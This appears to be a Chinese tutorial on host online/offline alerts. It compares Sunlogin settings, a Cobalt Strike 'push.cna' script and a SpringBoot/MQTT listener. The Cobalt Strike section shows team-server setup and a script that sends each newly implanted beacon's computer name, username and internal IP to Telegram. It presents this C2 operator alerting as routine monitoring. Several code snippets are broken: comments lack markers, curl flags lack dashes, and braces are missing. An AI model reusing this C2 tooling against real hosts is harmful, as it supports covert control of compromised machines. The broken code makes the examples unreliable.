如何实现主机上下线智能提醒功能

在现代的网络管理和运维工作中，主机上下线提醒功能是一项极为重要的工具。它可以帮助管理员实时掌握网络中主机的状态，及时响应各种网络事件，提高运维效率。本文将多维度探讨如何设置主机上下线提醒功能，涵盖向日葵、Cobalt Strike和SpringBoot集成MQTT等多种方案。

一、向日葵设置主机上下线提醒

向日葵是一款功能强大的远程控制软件，广泛应用于远程办公、技术支持等领域。其内置的主机上下线提醒功能，可以让管理员在主机状态发生变化时立即收到通知。

步骤一：打开向日葵客户端

首先，双击打开向日葵客户端。在主界面上，可以看到各种远程连接和控制的功能模块。

步骤二：进入设置界面

点击右上角“菜单”图标，选择“设置”选项。这一步将打开向日葵的设置界面，其中包含各种配置选项。

步骤三：配置主机上下线提醒

在“系统设置”界面中，找到并点击“常规”选项卡。这里有一个“主机上线/下线”勾选项，默认是不勾选的。勾选此选项后，向日葵将在主机上线或下线时发送提醒通知。

用户还可以根据个人需求，进一步配置提醒方式，比如通过系统通知、邮件通知或者第三方即时通讯工具通知。这样，无论管理员身处何地，都能及时了解到主机的状态变化。

二、Cobalt Strike实现主机上线提醒

Cobalt Strike是一款流行的渗透测试工具，通常用于红队演练和网络攻击模拟。在某些情况下，安全研究人员可能需要实时监控目标主机的上线情况，以便及时进行进一步的分析和控制。

安装与配置Cobalt Strike

以Ubuntu服务器为例，首先安装OpenJDK 8：

```bash

sudo apt-get install openjdk-8-jdk

java -version

```

检测安装成功后，解压Cobalt Strike并修改`teamserver`配置文件中的服务端口，以避免被爆破攻击。然后启动`teamserver`服务：

```bash

./teamserver 公网IP 密码 &

```

这里的公网IP和密码需要根据实际情况进行替换。

创建Push.cna脚本

为了实现主机上线提醒，需要在Cobalt Strike目录下创建一个`push.cna`脚本。这个脚本将使用Telegram Bot API来发送上线通知。当然，如果需要使用其他即时通讯工具，也可以对脚本进行相应的修改。

以下是`push.cna`脚本的一个示例：

```bash

set these config:

$bot_token = "xxxxxxx";

$chat_id = 'xxxxxxx'; Write your group_id or user_id

$teamserver_hostname = 'HOSTNAME-1'; You will reveive message containing it

$tg_bot_webhookURL = 'https://api.telegram.org/bot'.$bot_token.'/sendMessage';

$test_message = 'this is a test message, test success';

@curl_command = @('curl', '-X', 'POST', 'data-urlencode', 'chat_id='.$chat_id, 'data-urlencode', 'text='.$test_message, $tg_bot_webhookURL);

exec(@curl_command);

on beacon_initial {

println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1, "pid"));

local('$internalIP $computerName $userName');

$internalIP = replace(beacon_info($1, "internal"), " ", "_");

$computerName = replace(beacon_info($1, "computer"), " ", "_");

$userName = replace(beacon_info($1, "user"), " ", "_");

$message = 'Message from '.$teamserver_hostname.' Server%0aBeacon success implant Info Target:%0aComputer name : '.$computerName.'%0aUsername : '.$userName.'%0aIpaddres : '.$internalIP;

@curl_command = @('curl', '-X', 'POST', 'data-urlencode', 'chat_id='.$chat_id, 'data', 'text='.$message, $tg_bot_webhookURL);

exec(@curl_command);

```

运行Push.cna脚本

使用`agscript`工具运行无界面的Cobalt Strike客户端，并加载`push.cna`脚本。这样，每当有新的beacon上线时，Cobalt Strike就会自动发送一条包含目标主机信息的消息到Telegram。

三、SpringBoot集成MQTT实现上下线提醒

MQTT是一种轻量级的发布/订阅消息协议，广泛应用于物联网和移动应用等场景。通过SpringBoot集成MQTT，可以实现主机上下线提醒功能，从而实现对设备状态的实时监控。

安装与配置EMQX

首先，需要从EMQX官网下载并安装EMQX消息代理服务器。EMQX支持多种操作系统，安装过程相对简单。安装完成后，登录EMQX后台管理系统，进行必要的配置，比如开启系统主题订阅等。

下载与配置MQTTX调试工具

MQTTX是一款跨平台的MQTT客户端调试工具，支持Windows、macOS和Linux等多种操作系统。下载并安装MQTTX后，可以使用它进行MQTT连接调试，确保EMQX服务器正常工作。

编写SpringBoot应用

在SpringBoot项目中，引入Paho MQTT客户端依赖，并编写一个MQTT监听器类来监听设备上下线事件。以下是一个简单的示例代码：

```java

package com.mqtt.demo.listener;

import com.alibaba.fastjson.JSONObject;

import com.mqtt.demo.entity.QosEnum;

import org.eclipse.paho.client.mqttv3.IMqttMessageListener;

import org.eclipse.paho.client.mqttv3.MqttClient;

import org.eclipse.paho.client.mqttv3.MqttException;

import org.eclipse.paho.client.mqttv3.MqttMessage;

import org.slf4j.Logger;

import org.slf4j.LoggerFactory;

public class MqttOnOffListener {

private static final Logger logger = LoggerFactory.getLogger(MqttOnOffListener.class);

private static final String ON_OFF_LINE_TOPIC = "$SYS/brokers/+/clients/";

private MqttClient mqttClient;

public MqttOnOffListener(MqttClient mqttClient) {

this.mqttClient = mqttClient;

public void initListener() throws MqttException {

IMqttMessageListener listener = new IMqttMessageListener() {

@Override

public void messageArrived(String topic, MqttMessage message) {

logger.info("监听到的消息:{}", message.toString());

JSONObject jsonObject = JSONObject.parseObject(message.toString());

String clientId = jsonObject.getString("clientid");

String connected_at = jsonObject.getString("connected_at");

String disconnected_at = jsonObject.getString("disconnected_at");

if (connected_at != null && disconnected_at == null) {

logger.info("设备:{}上线啦!", clientId);

} else if (connected_at != null && disconnected_at != null) {

logger.info("设备:{}已离线!", clientId);

};

mqttClient.subscribe(ON_OFF_LINE_TOPIC, QosEnum.QOS2.getType(), listener);

```

在这个示例中，我们创建了一个`MqttOnOffListener`类，它使用Paho MQTT客户端订阅了EMQX的系统主题。当设备上线或下线时，EMQX会发布相应的消息到这个主题，我们的监听器就能及时捕获这些消息，并输出设备状态变化的信息。

四、总结

主机上下线提醒功能是提高网络管理和运维效率的重要手段。通过向日葵、Cobalt Strike和SpringBoot集成MQTT等多种方案，我们可以实现这一功能，并根据具体需求选择最适合自己的方案。无论使用哪种方案，都需要确保系统的稳定性和安全性，避免因为配置不当或漏洞导致的不必要的麻烦。希望本文能为大家提供一些有益的参考和启示。